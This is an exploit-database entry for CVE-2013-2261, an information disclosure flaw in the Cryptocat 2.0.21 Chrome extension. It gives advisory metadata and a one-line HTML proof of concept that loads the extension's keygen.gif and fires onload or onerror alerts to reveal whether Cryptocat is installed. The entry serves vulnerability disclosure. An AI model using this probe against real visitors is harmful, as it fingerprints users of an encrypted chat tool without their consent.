[] NeoSense
E X P L O I T S
title author type platform port cve id

Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure

Author: Mario Heiderich
type: remote
platform: multiple
port: 
date_added: 2012-11-07 
date_updated: 2015-11-05 
verified: 1 
codes: CVE-2013-2261;OSVDB-95000 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/61090/info

Cryptocat is prone to an information disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks.

Cryptocat 2.0.21 is vulnerable; other versions may also be affected.

<img src="chrome-extension://[extension-id-from-chrome-web-
store]/img/keygen.gif" onload=alert(/hascat/) onerror=alert(/hasnot/) >
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.